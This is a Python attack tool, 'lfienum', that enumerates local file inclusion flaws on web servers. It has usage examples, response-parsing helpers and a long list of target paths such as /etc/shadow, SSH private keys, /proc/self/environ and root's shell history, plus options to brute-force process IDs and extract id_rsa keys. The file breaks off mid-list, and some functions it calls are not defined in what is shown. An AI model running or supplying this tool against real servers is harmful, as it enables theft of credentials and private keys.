#!/usr/bin/python3
# lfienum (PoC) by 0bfxgh0st*
import sys, requests, re, base64
from bs4 import BeautifulSoup

ColGreenMark="\033[1;32m"
ColYellow="\033[0;33m"
ColYellowMark="\033[1;33m"
ColRedMark="\033[1;31m"
ColEnd="\033[0m"

def Help():

  print ('Local File Inclusion Enumerator v1.0 by 0bfxgh0st*')
  print ("Usage python3 lfienum <url> <option>\n")
  print ("Options:\n")
  print ("    -X POST/GET                   Request method\n")
  print ("    --pids <n>                    Bruteforce process id's from 0 to <n> (/proc/<n>/cmdline) [default is set to 999]")
  print ("    --pid <n>                     Show single process id")
  print ("    --fd <n>                      Bruteforce file descriptors from 0 to <n> (/proc/self/fd/<n>) [default is set to 30]")
  print ("    --wrapper <file>              Extract/decode hidden file using a wrapper (php://filter/convert.base64-encode/resource=)")
  print ("    -w,  --wordlist <wordlist>    Use a custom wordlist")
  print ("    -k,  --key                    Extract id_rsa key\n")
  print ('    -h,  --help                   Show help panel')
  print ('    -ah, --advanced-help          Show advanced help panel\n')
  print ("    -v,  -vvv                     Show package info")
  print ("    -ou, --only-url               Dump urls only\n")
  print ("    -x1                           Use XCF_A function print all text between tags (default)")
  print ("    -x2                           Use XCF_B function print all text that isn't between any tag")
  print ("    -x3                           Use XCF_C function print content between specific tag")
  print ("    -x4                           Use XCF_D function delete all content inside <html> and </html> tags")
  print ("    --exclude <string>            Exclude responses that contains given string\n")
  print ("Enumeration modes:\n")
  print ("    --data-mode <key name>        Data mode (LFI enumeration via data key)")
  print ("    --cookie-mode <key name>      Cookie mode (LFI enumeration via cookie key)\n")
  print ("Examples:\n")
  print ('    python3 lfienum "http://ghost.server/index.php?page="')
  print ('    python3 lfienum "http://ghost.server/" --cookie-mode session')
  print ('    python3 lfienum "http://ghost.server/index.js" --data-mode file')

def AdHelp():

  print ('\n[Default scan]\n')
  print ('    python3 lfienum "http://ghost.server/index.php?page="')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" -x2')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --only-url -x3')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --only-url -vvv\n')
  print ('[Bruteforece process id]\n')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --pids')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --pids 857')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --pids 259 -x4')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --pids 325 --only-url')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --pids 8492 --only-url -vvv\n')	
  print ('[Single process id]\n')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --pid 1')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --pid 487 -vvv')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --pid 371 --only-url')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --pid 6234 --only-url -vvv\n')
  print ('[Bruteforce File Descriptors]\n')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --fd')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --fd 56 -x2')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --fd 622 -vvv')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --fd 842 --only-url')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --fd 5654 --only-url -vvv\n')
  print ('[Wrapper]\n')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --wrapper index.php -x3')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --wrapper /etc/passwd -vvv')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --wrapper db.php --only-url')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --wrapper login.php --only-url -vvv\n')
  print ('[Wordlist]\n')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" -w wordlist.txt')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --wordlist wordlist.txt -vvv -x2')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --wordlist wordlist.txt --only-url -x3')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --wordlist wordlist.txt --only-url -vvv\n')
  print ('[ID RSA]\n')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" -k')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" -k -x2')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --key --only-url')
  print ('    python3 lfienum "http://ghost.server/index.php?page=" --key --only-url -vvv\n')
  print ('[COOKIE MODE]\n')
  print ('    python3 lfienum "http://ghost.server/index.php" --cookie-mode session')
  print ('    python3 lfienum "http://ghost.server/index.php" --cookie-mode PHPSESSID -k -x4')
  print ('    python3 lfienum "http://ghost.server/index.php" --cookie-mode session --pids 847 --only-url')
  print ('    python3 lfienum "http://ghost.server/index.php" --cookie-mode session --wrapper index.php --only-url -vvv\n')
  print ('[DATA MODE]\n')
  print ('    python3 lfienum "http://ghost.server/index.php" --data-mode file')
  print ('    python3 lfienum "http://ghost.server/index.php" --data-mode img -k -x3')
  print ('    python3 lfienum "http://ghost.server/index.php" --data-mode file --pids 137 --only-url')
  print ('    python3 lfienum "http://ghost.server/index.php" --data-mode file --wrapper index.php --only-url -vvv\n')

if '-h' in sys.argv or '--help' in sys.argv:
  Help()
  exit(1)
if '-ah' in sys.argv or '--advanced-help' in sys.argv:	
  Help()
  AdHelp()
  exit(1)
try:
  url = sys.argv[1]
except IndexError:
  Help()
  exit(1)

headers = {
  'User-Agent': '--'
}

def CheckCon():

  try:		
    r = request(url, headers=headers, timeout=10)
    try:
      selection_wordlist = [linux_wordlist,windows_wordlist]
      if 'microsoft'.casefold() in r.headers['Server'].casefold() or 'asp.net'.casefold() in r.headers['X-Powered-By'].casefold():
        prior_wordlist = selection_wordlist[1]
        later_wordlist = selection_wordlist[0]
      else:
        prior_wordlist = selection_wordlist[0]
        later_wordlist = selection_wordlist[1]	
    except KeyError:
      prior_wordlist = selection_wordlist[0]
      later_wordlist = selection_wordlist[1]
      pass		
  except requests.exceptions.ConnectTimeout:
    print ('Connection timed out.')
    exit(1)	
  except requests.exceptions.ConnectionError:	
    print ('Failed to establish a new connection: [Errno -2] Name or service not known')
    exit(1)
  except requests.exceptions.MissingSchema:
    print ("Invalid URL '" + url + "': No scheme supplied.")
    exit(1)

  return prior_wordlist,later_wordlist

def XCF_A(response):                  # this function aims to print all text between tags (default)

  proc_out = re.sub('<[^<]+?>', '', response.text)			
  content = proc_out.strip()
  return content

def XCF_B(response):                  # this function aims to print all text that isn't between any tag

  proc_out = re.sub('<[^<].*>', '', response.text)
  content = proc_out.strip()
  return content

def XCF_C(response):                  # this function aims to print content between specific tags

  soup = BeautifulSoup(response.content, 'html.parser')
  try:
    content = soup.find_all('p')[0].text.strip()
  except IndexError:
    Help()
    print("\n\nWARNING: Could not find correct tag, consider use of other -x flag")
    exit(1)
  #for i in soup.find_all(["p"]):
    #content = i.text
  return content
  
def XCF_D(response):                  # this function aims to delete all content inside <html> & </html> tags 

  soup = BeautifulSoup(response.content, 'html.parser')
  for i in soup.find_all('html'):
    i.decompose()   # same as i.replaceWith('')
  content = soup.get_text().strip()
  return content

def PackageStatus(response,content):

  print ('[Response Code]:', response.status_code)
  print ('[Content Lenght]:', len(content))
  lines = 0
  for nl in content:
    if nl == '\n':
      lines += 1
  print ('[Content Lines]:', lines+1, '\n')
	
only_url=False
package_status=False
if '-v' in sys.argv or '-vvv' in sys.argv:
  package_status=True	
if '--only-url' in sys.argv or '-ou' in sys.argv:
  only_url=True

XCF = XCF_A
if '-x1' in sys.argv:
	XCF = XCF_A
if '-x2' in sys.argv:
	XCF = XCF_B
if '-x3' in sys.argv:
	XCF = XCF_C
if '-x4' in sys.argv:
	XCF = XCF_D

linux_wordlist=['/etc/passwd',
'/etc/shadow',
'/etc/aliases',
'/etc/anacrontab',
'/etc/apache2/apache2.conf',
'/etc/apache2/httpd.conf',
'/etc/at.allow',
'/etc/at.deny',
'/etc/bashrc',
'/etc/bootptab',
'/etc/chrootUsers',
'/etc/chttp.conf',
'/etc/cron.allow',
'/etc/cron.deny',
'/etc/crontab',
'/etc/cups/cupsd.conf',
'/etc/exports',
'/etc/fstab',
'/etc/ftpaccess',
'/etc/ftpchroot',
'/etc/ftphosts',
'/etc/groups',
'/etc/grub.conf',
'/etc/hosts',
'/etc/hosts.allow',
'/etc/hosts.deny',
'/etc/httpd/access.conf',
'/etc/httpd/conf/httpd.conf',
'/etc/httpd/httpd.conf',
'/etc/httpd/logs/access_log',
'/etc/httpd/logs/access.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/etc/httpd/php.ini',
'/etc/httpd/srm.conf',
'/etc/inetd.conf',
'/etc/inittab',
'/etc/issue',
'/etc/lighttpd.conf',
'/etc/lilo.conf',
'/etc/logrotate.d/ftp',
'/etc/logrotate.d/proftpd',
'/etc/logrotate.d/vsftpd.log',
'/etc/lsb-release',
'/etc/motd',
'/etc/modules.conf',
'/etc/mtab',
'/etc/my.cnf',
'/etc/my.conf',
'/etc/mysql/my.cnf',
'/etc/network/interfaces',
'/etc/networks',
'/etc/npasswd',
'/etc/php4.4/fcgi/php.ini',
'/etc/php4/apache2/php.ini',
'/etc/php4/apache/php.ini',
'/etc/php4/cgi/php.ini',
'/etc/php5/apache2/php.ini',
'/etc/php5/apache/php.ini',
'/etc/php/apache2/php.ini',
'/etc/php/apache/php.ini',
'/etc/php/cgi/php.ini',
'/etc/php.ini',
'/etc/php/php4/php.ini',
'/etc/php/php.ini',
'/etc/printcap',
'/etc/profile',
'/etc/proftp.conf',
'/etc/proftpd/proftpd.conf',
'/etc/pure-ftpd.conf',
'/etc/pureftpd.passwd',
'/etc/pureftpd.pdb',
'/etc/pure-ftpd/pure-ftpd.conf',
'/etc/pure-ftpd/pure-ftpd.pdb',
'/etc/pure-ftpd/putreftpd.pdb',
'/etc/redhat-release',
'/etc/resolv.conf',
'/etc/samba/smb.conf',
'/etc/snmpd.conf',
'/etc/ssh/ssh_config',
'/etc/ssh/sshd_config',
'/etc/ssh/ssh_host_dsa_key',
'/etc/ssh/ssh_host_dsa_key.pub',
'/etc/ssh/ssh_host_key',
'/etc/ssh/ssh_host_key.pub',
'/etc/sysconfig/network',
'/etc/syslog.conf',
'/etc/termcap',
'/etc/vhcs2/proftpd/proftpd.conf',
'/etc/vsftpd.chroot_list',
'/etc/vsftpd.conf',
'/etc/vsftpd/vsftpd.conf',
'/etc/wu-ftpd/ftpaccess',
'/etc/wu-ftpd/ftphosts',
'/etc/wu-ftpd/ftpusers',
'/logs/pure-ftpd.log',
'/logs/security_debug_log',
'/logs/security_log',
'/opt/lampp/etc/httpd.conf',
'/opt/xampp/etc/php.ini',
'/proc/cpuinfo',
'/proc/filesystems',
'/proc/interrupts',
'/proc/ioports',
'/proc/meminfo',
'/proc/modules',
'/proc/mounts',
'/proc/sched_debug',
'/proc/stat',
'/proc/swaps',
'/proc/version',
'/proc/self/net/arp',
'/root/anaconda-ks.cfg',
'/usr/etc/pure-ftpd.conf',
'/usr/lib/php.ini',
'/usr/lib/php/php.ini',
'/usr/local/apache/conf/modsec.conf',
'/usr/local/apache/conf/php.ini',
'/usr/local/apache/log',
'/usr/local/apache/logs',
'/usr/local/apache/logs/access_log',
'/usr/local/apache/logs/access.log',
'/usr/local/apache/audit_log',
'/usr/local/apache/error_log',
'/usr/local/apache/error.log',
'/usr/local/cpanel/logs',
'/usr/local/cpanel/logs/access_log',
'/usr/local/cpanel/logs/error_log',
'/usr/local/cpanel/logs/license_log',
'/usr/local/cpanel/logs/login_log',
'/usr/local/cpanel/logs/stats_log',
'/usr/local/etc/httpd/logs/access_log',
'/usr/local/etc/httpd/logs/error_log',
'/usr/local/etc/php.ini',
'/usr/local/etc/pure-ftpd.conf',
'/usr/local/etc/pureftpd.pdb',
'/usr/local/lib/php.ini',
'/usr/local/php4/httpd.conf',
'/usr/local/php4/httpd.conf.php',
'/usr/local/php4/lib/php.ini',
'/usr/local/php5/httpd.conf',
'/usr/local/php5/httpd.conf.php',
'/usr/local/php5/lib/php.ini',
'/usr/local/php/httpd.conf',
'/usr/local/php/httpd.conf.ini',
'/usr/local/php/lib/php.ini',
'/usr/local/pureftpd/etc/pure-ftpd.conf',
'/usr/local/pureftpd/etc/pureftpd.pdn',
'/usr/local/pureftpd/sbin/pure-config.pl',
'/usr/local/www/logs/httpd_log',
'/usr/local/Zend/etc/php.ini',
'/usr/sbin/pure-config.pl',
'/var/adm/log/xferlog',
'/var/apache2/config.inc',
'/var/apache/logs/access_log',
'/var/apache/logs/error_log',
'/var/cpanel/cpanel.config',
'/var/lib/mysql/my.cnf',
'/var/lib/mysql/mysql/user.MYD',
'/var/local/www/conf/php.ini',
'/var/log/apache2/access_log',
'/var/log/apache2/access.log',
'/var/log/apache2/error_log',
'/var/log/apache2/error.log',
'/var/log/apache/access_log',
'/var/log/apache/access.log',
'/var/log/apache/error_log',
'/var/log/apache/error.log',
'/var/log/apache-ssl/access.log',
'/var/log/apache-ssl/error.log',
'/var/log/auth.log',
'/var/log/boot',
'/var/htmp',
'/var/log/chttp.log',
'/var/log/cups/error.log',
'/var/log/daemon.log',
'/var/log/debug',
'/var/log/dmesg',
'/var/log/dpkg.log',
'/var/log/exim_mainlog',
'/var/log/exim/mainlog',
'/var/log/exim_paniclog',
'/var/log/exim.paniclog',
'/var/log/exim_rejectlog',
'/var/log/exim/rejectlog',
'/var/log/faillog',
'/var/log/ftplog',
'/var/log/ftp-proxy',
'/var/log/ftp-proxy/ftp-proxy.log',
'/var/log/httpd/access_log',
'/var/log/httpd/access.log',
'/var/log/httpd/error_log',
'/var/log/httpd/error.log',
'/var/log/httpsd/ssl.access_log',
'/var/log/httpsd/ssl_log',
'/var/log/kern.log',
'/var/log/lastlog',
'/var/log/lighttpd/access.log',
'/var/log/lighttpd/error.log',
'/var/log/lighttpd/lighttpd.access.log',
'/var/log/lighttpd/lighttpd.error.log',
'/var/log/mail.info',
'/var/log/mail.log',
'/var/log/maillog',
'/var/log/mail.warn',
'/var/log/message',
'/var/log/messages',
'/var/log/mysqlderror.log',
'/var/log/mysql.log',
'/var/log/mysql/mysql-bin.log',
'/var/log/mysql/mysql.log',
'/var/log/mysql/mysql-slow.log',
'/var/log/proftpd',
'/var/log/pureftpd.log',
'/var/log/pure-ftpd/pure-ftpd.log',
'/var/log/secure',
'/var/log/vsftpd.log',
'/var/log/wtmp',
'/var/log/xferlog',
'/var/log/yum.log',
'/var/mysql.log',
'/var/run/utmp',
'/var/spool/cron/crontabs/root',
'/var/webmin/miniserv.log',
'/var/www/log/access_log',
'/var/www/log/error_log',
'/var/www/logs/access_log',
'/var/www/logs/error_log',
'/var/www/logs/access.log',
'/var/www/logs/error.log',
'~/.atfp_history',
'~/.bash_history',
'~/.bash_logout',
'~/.bash_profile',
'~/.bashrc',
'~/.gtkrc',
'~/.login',
'~/.logout',
'~/.mysql_history',
'~/.nano_history',
'~/.php_history',
'~/.profile',
'~/.ssh/authorized_keys',
'~/.ssh/id_dsa',
'~/.ssh/id_dsa.pub',
'~/.ssh/id_rsa',
'~/.ssh/id_rsa.pub',
'~/.ssh/identity',
'~/.ssh/identity.pub',
'~/.viminfo',
'~/.wm_style',
'~/.Xdefaults',
'~/.xinitrc',
'~/.Xresources',
'~/.xsession',
'/apache/conf/httpd.conf',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/php/php.ini',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/bin/php.ini',
'/etc/adduser.conf',
'/etc/alias',
'/etc/apache/access.conf',
'/etc/apache/apache.conf',
'/etc/apache/conf/httpd.conf',
'/etc/apache/default-server.conf',
'/etc/apache/httpd.conf',
'/etc/apache2/apache.conf',
'/etc/apache2/conf.d/charset',
'/etc/apache2/conf.d/phpmyadmin.conf',
'/etc/apache2/conf.d/security',
'/etc/apache2/conf/httpd.conf',
'/etc/apache2/default-server.conf',
'/etc/apache2/envvars',
'/etc/apache2/httpd2.conf',
'/etc/apache2/mods-available/autoindex.conf',
'/etc/apache2/mods-available/deflate.conf',
'/etc/apache2/mods-available/dir.conf',
'/etc/apache2/mods-available/mem_cache.conf',
'/etc/apache2/mods-available/mime.conf',
'/etc/apache2/mods-available/proxy.conf',
'/etc/apache2/mods-available/setenvif.conf',
'/etc/apache2/mods-available/ssl.conf',
'/etc/apache2/mods-enabled/alias.conf',
'/etc/apache2/mods-enabled/deflate.conf',
'/etc/apache2/mods-enabled/dir.conf',
'/etc/apache2/mods-enabled/mime.conf',
'/etc/apache2/mods-enabled/negotiation.conf',
'/etc/apache2/mods-enabled/php5.conf',
'/etc/apache2/mods-enabled/status.conf',
'/etc/apache2/ports.conf',
'/etc/apache2/sites-available/default',
'/etc/apache2/sites-available/default-ssl',
'/etc/apache2/sites-enabled/000-default',
'/etc/apache2/sites-enabled/default',
'/etc/apache2/ssl-global.conf',
'/etc/apache2/vhosts.d/00_default_vhost.conf',
'/etc/apache2/vhosts.d/default_vhost.include',
'/etc/apache22/conf/httpd.conf',
'/etc/apache22/httpd.conf',
'/etc/apt/apt.conf',
'/etc/avahi/avahi-daemon.conf',
'/etc/bash.bashrc',
'/etc/bash_completion.d/debconf',
'/etc/bluetooth/input.conf',
'/etc/bluetooth/main.conf',
'/etc/bluetooth/network.conf',
'/etc/bluetooth/rfcomm.conf',
'/etc/ca-certificates.conf',
'/etc/ca-certificates.conf.dpkg-old',
'/etc/casper.conf',
'/etc/chkrootkit.conf',
'/etc/clamav/clamd.conf',
'/etc/clamav/freshclam.conf',
'/etc/crypttab',
'/etc/cups/acroread.conf',
'/etc/cups/cupsd.conf.default',
'/etc/cups/pdftops.conf',
'/etc/cups/printers.conf',
'/etc/cvs-cron.conf',
'/etc/cvs-pserver.conf',
'/etc/debconf.conf',
'/etc/debian_version',
'/etc/default/grub',
'/etc/deluser.conf',
'/etc/dhcp/dhclient.conf',
'/etc/dhcp3/dhclient.conf',
'/etc/dhcp3/dhcpd.conf',
'/etc/dns2tcpd.conf',
'/etc/e2fsck.conf',
'/etc/esound/esd.conf',
'/etc/etter.conf',
'/etc/fedora-release',
'/etc/firewall.rules',
'/etc/foremost.conf',
'/etc/ftpusers',
'/etc/fuse.conf',
'/etc/group',
'/etc/group-',
'/etc/hdparm.conf',
'/etc/host.conf',
'/etc/hostname',
'/etc/http/conf/httpd.conf',
'/etc/http/httpd.conf',
'/etc/httpd.conf',
'/etc/httpd/apache.conf',
'/etc/httpd/apache2.conf',
'/etc/httpd/conf',
'/etc/httpd/conf.d',
'/etc/httpd/conf.d/php.conf',
'/etc/httpd/conf.d/squirrelmail.conf',
'/etc/httpd/conf/apache.conf',
'/etc/httpd/conf/apache2.conf',
'/etc/httpd/extra/httpd-ssl.conf',
'/etc/httpd/mod_php.conf',
'/etc/init.d',
'/etc/ipfw.conf',
'/etc/ipfw.rules',
'/etc/issue.net',
'/etc/kbd/config',
'/etc/kernel-img.conf',
'/etc/kernel-pkg.conf',
'/etc/ld.so.conf',
'/etc/ldap/ldap.conf',
'/etc/lighttpd/lighthttpd.conf',
'/etc/login.defs',
'/etc/logrotate.conf',
'/etc/ltrace.conf',
'/etc/mail/sendmail.conf',
'/etc/mandrake-release',
'/etc/manpath.config',
'/etc/miredo.conf',
'/etc/miredo/miredo.conf',
'/etc/miredo/miredo-server.conf',
'/etc/miredo-server.conf',
'/etc/modprobe.d/vmware-tools.conf',
'/etc/modules',
'/etc/mono/1.0/machine.config',
'/etc/mono/2.0/machine.config',
'/etc/mono/2.0/web.config',
'/etc/mono/config',
'/etc/mtools.conf',
'/etc/muddleftpd.com',
'/etc/muddleftpd/muddleftpd.conf',
'/etc/muddleftpd/muddleftpd.passwd',
'/etc/muddleftpd/mudlog',
'/etc/muddleftpd/mudlogd.conf',
'/etc/muddleftpd/passwd',
'/etc/mysql/conf.d/old_passwords.cnf',
'/etc/newsyslog.conf',
'/etc/nginx/nginx.conf',
'/etc/openldap/ldap.conf',
'/etc/os-release',
'/etc/osxhttpd/osxhttpd.conf',
'/etc/pam.conf',
'/etc/pam.d/proftpd',
'/etc/passwd-',
'/etc/passwd~',
'/etc/password.master',
'/etc/php5/cgi/php.ini',
'/etc/phpmyadmin/config.inc.php',
'/etc/postgresql/pg_hba.conf',
'/etc/postgresql/postgresql.conf',
'/etc/proftpd/modules.conf',
'/etc/protpd/proftpd.conf',
'/etc/pulse/client.conf',
'/etc/pure-ftpd/pureftpd.pdb',
'/etc/rc.conf',
'/etc/rc.d/rc.httpd',
'/etc/resolvconf/update-libc.d/sendmail',
'/etc/samba/dhcp.conf',
'/etc/samba/netlogon',
'/etc/samba/private/smbpasswd',
'/etc/samba/samba.conf',
'/etc/samba/smb.conf.user',
'/etc/samba/smbpasswd',
'/etc/samba/smbusers',
'/etc/security/access.conf',
'/etc/security/environ',
'/etc/security/failedlogin',
'/etc/security/group',
'/etc/security/group.conf',
'/etc/security/lastlog',
'/etc/security/limits',
'/etc/security/limits.conf',
'/etc/security/namespace.conf',
'/etc/security/opasswd',
'/etc/security/pam_env.conf',
'/etc/security/passwd',
'/etc/security/sepermit.conf',
'/etc/security/time.conf',
'/etc/security/user',
'/etc/sensors.conf',
'/etc/sensors3.conf',
'/etc/shadow-',
'/etc/shadow~',
'/etc/slackware-release',
'/etc/smb.conf',
'/etc/smbpasswd',
'/etc/smi.conf',
'/etc/squirrelmail/apache.conf',
'/etc/squirrelmail/config.php',
'/etc/squirrelmail/config/config.php',
'/etc/squirrelmail/config_default.php',
'/etc/squirrelmail/config_local.php',
'/etc/squirrelmail/default_pref',
'/etc/squirrelmail/filters_setup.php',
'/etc/squirrelmail/index.php',
'/etc/squirrelmail/sqspell_config.php',
'/etc/sso/sso_config.ini',
'/etc/stunnel/stunnel.conf',
'/etc/subversion/config',
'/etc/sudoers',
'/etc/SUSE-release',
'/etc/sw-cp-server/applications.d/00-sso-cpserver.conf',
'/etc/sw-cp-server/applications.d/plesk.conf',
'/etc/sysconfig/network-scripts/ifcfg-eth0',
'/etc/sysctl.conf',
'/etc/sysctl.d/10-console-messages.conf',
'/etc/sysctl.d/10-network-security.conf',
'/etc/sysctl.d/10-process-security.conf',
'/etc/sysctl.d/wine.sysctl.conf',
'/etc/timezone',
'/etc/tinyproxy/tinyproxy.conf',
'/etc/tor/tor-tsocks.conf',
'/etc/tsocks.conf',
'/etc/updatedb.conf',
'/etc/updatedb.conf.BeforeVMwareToolsInstall',
'/etc/utmp',
'/etc/vmware-tools/config',
'/etc/vmware-tools/tpvmlp.conf',
'/etc/vmware-tools/vmware-tools-libraries.conf',
'/etc/webmin/miniserv.conf',
'/etc/webmin/miniserv.users',
'/etc/wicd/dhclient.conf.template.default',
'/etc/wicd/manager-settings.conf',
'/etc/wicd/wired-settings.conf',
'/etc/wicd/wireless-settings.conf',
'/etc/X11/xorg.conf',
'/etc/X11/xorg.conf.BeforeVMwareToolsInstall',
'/etc/X11/xorg.conf.orig',
'/etc/X11/xorg.conf-vesa',
'/etc/X11/xorg.conf-vmware',
'/home/bin/stable/apache/php.ini',
'/home/postgres/data/pg_hba.conf',
'/home/postgres/data/pg_ident.conf',
'/home/postgres/data/PG_VERSION',
'/home/postgres/data/postgresql.conf',
'/home/user/lighttpd/lighttpd.conf',
'/home2/bin/stable/apache/php.ini',
'/http/httpd.conf',
'/Library/WebServer/Documents/.htaccess',
'/Library/WebServer/Documents/default.htm',
'/Library/WebServer/Documents/default.html',
'/Library/WebServer/Documents/default.php',
'/Library/WebServer/Documents/index.htm',
'/Library/WebServer/Documents/index.html',
'/Library/WebServer/Documents/index.php',
'/logs/access.log',
'/logs/access_log',
'/logs/error.log',
'/logs/error_log',
'/mysql/bin/my.ini',
'/MySQL/data/{HOST}.err',
'/MySQL/data/mysql.err',
'/MySQL/data/mysql.log',
'/MySQL/data/mysql-bin.index',
'/MySQL/data/mysql-bin.log',
'/MySQL/my.cnf',
'/MySQL/my.ini',
'/NetServer/bin/stable/apache/php.ini',
'/opt/apache/apache.conf',
'/opt/apache/apache2.conf',
'/opt/apache/conf/apache.conf',
'/opt/apache/conf/apache2.conf',
'/opt/apache/conf/httpd.conf',
'/opt/apache2/apache.conf',
'/opt/apache2/apache2.conf',
'/opt/apache2/conf/apache.conf',
'/opt/apache2/conf/apache2.conf',
'/opt/apache2/conf/httpd.conf',
'/opt/apache22/conf/httpd.conf',
'/opt/httpd/apache.conf',
'/opt/httpd/apache2.conf',
'/opt/httpd/conf/apache.conf',
'/opt/httpd/conf/apache2.conf',
'/opt/lampp/logs/access.log',
'/opt/lampp/logs/access_log',
'/opt/lampp/logs/error.log',
'/opt/lampp/logs/error_log',
'/opt/lsws/conf/httpd_conf.xml',
'/opt/lsws/logs/access.log',
'/opt/lsws/logs/error.log',
'/opt/tomcat/conf/tomcat-users.xml',
'/opt/tomcat/logs/catalina.err',
'/opt/tomcat/logs/catalina.out',
'/opt/xampp/logs/access.log',
'/opt/xampp/logs/access_log',
'/opt/xampp/logs/error.log',
'/opt/xampp/logs/error_log',
'/php/php.ini',
'/php4/php.ini',
'/php5/php.ini',
'/PostgreSQL/log/pgadmin.log',
'/private/etc/httpd/apache.conf',
'/private/etc/httpd/apache2.conf',
'/private/etc/httpd/httpd.conf',
'/private/etc/httpd/httpd.conf.default',
'/private/etc/squirrelmail/config/config.php',
'/proc/devices',
'/proc/net/tcp',
'/proc/net/udp',
'/proc/self/cmdline',
'/proc/self/environ',
'/proc/self/mounts',
'/proc/self/stat',
'/proc/self/status',
'/root/.bash_config',
'/root/.bash_history',
'/root/.bash_logout',
'/root/.bashrc',
'/root/.ksh_history',
'/root/.Xauthority',
'/srv/www/htdos/squirrelmail/config/config.php',
'/System/Library/WebObjects/Adaptors/Apache2.2/apache.conf',
'/tmp/access.log',
'/usr/apache/conf/httpd.conf',
'/usr/apache2/conf/httpd.conf',
'/usr/home/user/lighttpd/lighttpd.conf',
'/usr/home/user/var/log/apache.log',
'/usr/home/user/var/log/lighttpd.error.log',
'/usr/internet/pgsql/data/pg_hba.conf',
'/usr/internet/pgsql/data/postmaster.log',
'/usr/lib/cron/log',
'/usr/lib/security/mkuser.default',
'/usr/local/apache/apache.conf',
'/usr/local/apache/apache2.conf',
'/usr/local/apache/conf/access.conf',
'/usr/local/apache/conf/apache.conf',
'/usr/local/apache/conf/apache2.conf',
'/usr/local/apache/conf/httpd.conf',
'/usr/local/apache/conf/httpd.conf.default',
'/usr/local/apache/conf/vhosts.conf',
'/usr/local/apache/conf/vhosts-custom.conf',
'/usr/local/apache/httpd.conf',
'/usr/local/apache/logs/audit_log',
'/usr/local/apache/logs/error.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/lighttpd.error.log',
'/usr/local/apache/logs/lighttpd.log',
'/usr/local/apache/logs/mod_jk.log',
'/usr/local/apache1.3/conf/httpd.conf',
'/usr/local/apache2/apache.conf',
'/usr/local/apache2/apache2.conf',
'/usr/local/apache2/conf/apache.conf',
'/usr/local/apache2/conf/apache2.conf',
'/usr/local/apache2/conf/extra/httpd-ssl.conf',
'/usr/local/apache2/conf/httpd.conf',
'/usr/local/apache2/conf/modsec.conf',
'/usr/local/apache2/conf/ssl.conf',
'/usr/local/apache2/conf/vhosts.conf',
'/usr/local/apache2/conf/vhosts-custom.conf',
'/usr/local/apache2/httpd.conf',
'/usr/local/apache2/logs/access.log',
'/usr/local/apache2/logs/access_log',
'/usr/local/apache2/logs/audit_log',
'/usr/local/apache2/logs/error.log',
'/usr/local/apache2/logs/error_log',
'/usr/local/apache2/logs/lighttpd.error.log',
'/usr/local/apache2/logs/lighttpd.log',
'/usr/local/apache22/conf/httpd.conf',
'/usr/local/apache22/httpd.conf',
'/usr/local/apps/apache/conf/httpd.conf',
'/usr/local/apps/apache2/conf/httpd.conf',
'/usr/local/apps/apache22/conf/httpd.conf',
'/usr/local/etc/apache/conf/httpd.conf',
'/usr/local/etc/apache/httpd.conf',
'/usr/local/etc/apache/vhosts.conf',
'/usr/local/etc/apache2/conf/httpd.conf',
'/usr/local/etc/apache2/httpd.conf',
'/usr/local/etc/apache2/vhosts.conf',
'/usr/local/etc/apache22/conf/httpd.conf',
'/usr/local/etc/apache22/httpd.conf',
'/usr/local/etc/httpd/conf',
'/usr/local/etc/httpd/conf/httpd.conf',
'/usr/local/etc/lighttpd.conf',
'/usr/local/etc/lighttpd.conf.new',
'/usr/local/etc/nginx/nginx.conf',
'/usr/local/etc/smb.conf',
'/usr/local/etc/webmin/miniserv.conf',
'/usr/local/etc/webmin/miniserv.users',
'/usr/local/httpd/conf/httpd.conf',
'/usr/local/jakarta/dist/tomcat/conf/context.xml',
'/usr/local/jakarta/dist/tomcat/conf/jakarta.conf',
'/usr/local/jakarta/dist/tomcat/conf/logging.properties',
'/usr/local/jakarta/dist/tomcat/conf/server.xml',
'/usr/local/jakarta/dist/tomcat/conf/workers.properties',
'/usr/local/jakarta/dist/tomcat/logs/mod_jk.log',
'/usr/local/jakarta/tomcat/conf/context.xml',
'/usr/local/jakarta/tomcat/conf/jakarta.conf',
'/usr/local/jakarta/tomcat/conf/logging.properties',
'/usr/local/jakarta/tomcat/conf/server.xml',
'/usr/local/jakarta/tomcat/conf/workers.properties',
'/usr/local/jakarta/tomcat/logs/catalina.err',
'/usr/local/jakarta/tomcat/logs/catalina.out',
'/usr/local/jakarta/tomcat/logs/mod_jk.log',
'/usr/local/lighttpd/conf/lighttpd.conf',
'/usr/local/lighttpd/log/access.log',
'/usr/local/lighttpd/log/lighttpd.error.log',
'/usr/local/logs/access.log',
'/usr/local/logs/samba.log',
'/usr/local/lsws/conf/httpd_conf.xml',
'/usr/local/lsws/logs/error.log',
'/usr/local/mysql/data/{HOST}.err',
